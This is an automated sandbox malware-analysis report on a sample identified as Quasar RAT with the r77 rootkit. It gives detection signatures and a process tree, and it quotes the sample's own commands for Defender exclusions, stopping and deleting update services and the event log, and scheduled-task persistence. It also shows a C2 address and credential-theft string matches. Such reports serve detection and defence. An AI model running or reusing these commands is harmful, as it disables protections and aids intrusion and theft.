Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5fr5gthkjdg71.exe

Overview

General Information

Sample name:5fr5gthkjdg71.exe
Analysis ID:1583267
MD5:13b0dec8a2c9291ec13ca9d0f1a98b33
SHA1:762c7072179bce1822999dc30c6252262caf6c00
SHA256:210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba
Tags:exequasarQuasarRATuser-juroots
Infos:

Detection

Quasar, R77 RootKit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Sigma detected: Stop multiple services
Yara detected Quasar RAT
Yara detected R77 RootKit
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Protects its processes via BreakOnTermination flag
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Uses Register-ScheduledTask to add task schedules
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 5fr5gthkjdg71.exe (PID: 7452 cmdline: "C:\Users\user\Desktop\5fr5gthkjdg71.exe" MD5: 13B0DEC8A2C9291EC13CA9D0F1A98B33)
    • gfiKDLgr58thy4d.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" MD5: 952F360A4651F948BE3A673178631641)
      • powershell.exe (PID: 7564 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8148 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 916 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 8172 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3912 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7460 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7872 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 7960 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • powercfg.exe (PID: 7748 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7700 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7836 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7852 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 7680 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • kaptsegthwf.exe (PID: 7488 cmdline: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe MD5: 952F360A4651F948BE3A673178631641)
          • powershell.exe (PID: 7376 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7744 cmdline: C:\Windows\system32\sc.exe delete "WAGDKRVZ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5848 cmdline: C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7372 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5676 cmdline: C:\Windows\system32\sc.exe start "WAGDKRVZ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • GR55Qg1hth.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\GR55Qg1hth.exe" MD5: 8E40252356A6FB3F8F52D1EFFA2C2C3C)
      • powershell.exe (PID: 7588 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8124 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1396 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • sc.exe (PID: 7500 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • sc.exe (PID: 7868 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • sc.exe (PID: 4040 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • sc.exe (PID: 7972 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • reg.exe (PID: 7672 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 7216 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 7244 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 7248 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 3624 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8132 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 2500 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • powercfg.exe (PID: 7480 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • powercfg.exe (PID: 7520 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • powercfg.exe (PID: 7876 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • powershell.exe (PID: 8156 cmdline: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • F4R5fd8grr.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\F4R5fd8grr.exe" MD5: EA001F076677C9B0DD774AE670EFDF63)
      • schtasks.exe (PID: 7864 cmdline: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Client.exe (PID: 7916 cmdline: "C:\Users\user\AppData\Roaming\SubDir\Client.exe" MD5: EA001F076677C9B0DD774AE670EFDF63)
        • schtasks.exe (PID: 7960 cmdline: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • F4R5fd8grr.exe (PID: 7952 cmdline: C:\Users\user\Desktop\F4R5fd8grr.exe MD5: EA001F076677C9B0DD774AE670EFDF63)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
NameDescriptionAttributionBlogpost URLsLink
r77, r77 RootkitAccording to the author, r77 is a ring 3 rootkit that hides everything: * Files, directories* Processes & CPU usage* Registry keys & values* Services* TCP & UDP connections* Junctions, named pipes, scheduled tasksNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.r77
{"Version": "1.4.0", "Host:Port": "185.148.3.216:4000;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c3557859-56ac-475e-b44d-e1b60c20d0d0", "Tag": "4Drun", "LogDirectoryName": "Logs"}
SourceRuleDescriptionAuthorStrings
5fr5gthkjdg71.exeJoeSecurity_QuasarYara detected Quasar RATJoe Security
    5fr5gthkjdg71.exeMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
    • 0x5e7bf1:$x1: Quasar.Common.Messages
    • 0x5eb2aa:$x1: Quasar.Common.Messages
    • 0x5f7545:$x4: Uninstalling... good bye :-(
    • 0x5f8c6a:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
    5fr5gthkjdg71.exeINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
    • 0x5f6ee9:$f1: FileZilla\recentservers.xml
    • 0x5f6f29:$f2: FileZilla\sitemanager.xml
    • 0x5f6f6b:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
    • 0x5f70e9:$b1: Chrome\User Data\
    • 0x5f725f:$b2: Mozilla\Firefox\Profiles
    • 0x5f735b:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
    • 0x602854:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
    • 0x5f73f7:$b4: Opera Software\Opera Stable\Login Data
    • 0x5f7461:$b5: YandexBrowser\User Data\
    • 0x5f72af:$s4: logins.json
    • 0x5f7155:$a1: username_value
    • 0x5f7173:$a2: password_value
    • 0x5f72ef:$a3: encryptedUsername
    • 0x602798:$a3: encryptedUsername
    • 0x5f7313:$a4: encryptedPassword
    • 0x6027b6:$a4: encryptedPassword
    • 0x602734:$a5: httpRealm
    5fr5gthkjdg71.exeMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
    • 0x5b938b:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
    • 0x5b9436:$s2: DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null
    • 0x5f762f:$s3: Process already elevated.
    • 0x5e7abf:$s4: get_PotentiallyVulnerablePasswords
    • 0x5e287c:$s5: GetKeyloggerLogsDirectory
    • 0x5eb065:$s5: GetKeyloggerLogsDirectory
    • 0x5e7ae2:$s6: set_PotentiallyVulnerablePasswords
    • 0x603fa8:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\SubDir\Client.exeJoeSecurity_QuasarYara detected Quasar RATJoe Security
      C:\Users\user\AppData\Roaming\SubDir\Client.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\Users\user\AppData\Roaming\SubDir\Client.exeMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
        • 0x5b594:$x1: Quasar.Common.Messages
        • 0x5ec4d:$x1: Quasar.Common.Messages
        • 0x6aee8:$x4: Uninstalling... good bye :-(
        • 0x6c60d:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
        C:\Users\user\AppData\Roaming\SubDir\Client.exeVermin_Keylogger_Jan18_1Detects Vermin KeyloggerFlorian Roth
        • 0x5c0d1:$s2: set_SystemInfos
        • 0x57ad9:$s4: set_RemotePath
        • 0x7cc4c:$s6: Client.exe
        • 0x7cd0c:$s6: Client.exe
        C:\Users\user\AppData\Roaming\SubDir\Client.exeINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
        • 0x6a88c:$f1: FileZilla\recentservers.xml
        • 0x6a8cc:$f2: FileZilla\sitemanager.xml
        • 0x6a90e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
        • 0x6aa8c:$b1: Chrome\User Data\
        • 0x6ac02:$b2: Mozilla\Firefox\Profiles
        • 0x6acfe:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x761f7:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x6ad9a:$b4: Opera Software\Opera Stable\Login Data
        • 0x6ae04:$b5: YandexBrowser\User Data\
        • 0x6ac52:$s4: logins.json
        • 0x6aaf8:$a1: username_value
        • 0x6ab16:$a2: password_value
        • 0x6ac92:$a3: encryptedUsername
        • 0x7613b:$a3: encryptedUsername
        • 0x6acb6:$a4: encryptedPassword
        • 0x76159:$a4: encryptedPassword
        • 0x760d7:$a5: httpRealm
        Click to see the 7 entries
        SourceRuleDescriptionAuthorStrings
        00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_R77RootKitYara detected R77 RootKitJoe Security
          00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmpWindows_Rootkit_R77_5bab748bunknownunknown
          • 0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
          00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
            00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_R77RootKitYara detected R77 RootKitJoe Security
              00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmpWindows_Rootkit_R77_5bab748bunknownunknown
              • 0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
              Click to see the 14 entries
              SourceRuleDescriptionAuthorStrings
              66.2.kaptsegthwf.exe.23e07f70000.2.raw.unpackJoeSecurity_R77RootKitYara detected R77 RootKitJoe Security
                66.2.kaptsegthwf.exe.23e07f70000.2.raw.unpackWindows_Rootkit_R77_5bab748bunknownunknown
                • 0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
                68.2.conhost.exe.1a646d10000.2.raw.unpackJoeSecurity_R77RootKitYara detected R77 RootKitJoe Security
                  68.2.conhost.exe.1a646d10000.2.raw.unpackWindows_Rootkit_R77_5bab748bunknownunknown
                  • 0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
                  66.2.kaptsegthwf.exe.23e07fa0000.3.unpackJoeSecurity_R77RootKitYara detected R77 RootKitJoe Security
                    Click to see the 25 entries

                    Change of critical system settings

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7748, ProcessName: powercfg.exe

                    Operating System Destruction

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\GR55Qg1hth.exe" , ParentImage: C:\Users\user\Desktop\GR55Qg1hth.exe, ParentProcessId: 7540, ParentProcessName: GR55Qg1hth.exe, ProcessCommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 8124, ProcessName: cmd.exe

                    System Summary

                    barindex
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GR55Qg1hth.exe" , ParentImage: C:\Users\user\Desktop\GR55Qg1hth.exe, ParentProcessId: 7540, ParentProcessName: GR55Qg1hth.exe, ProcessCommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' 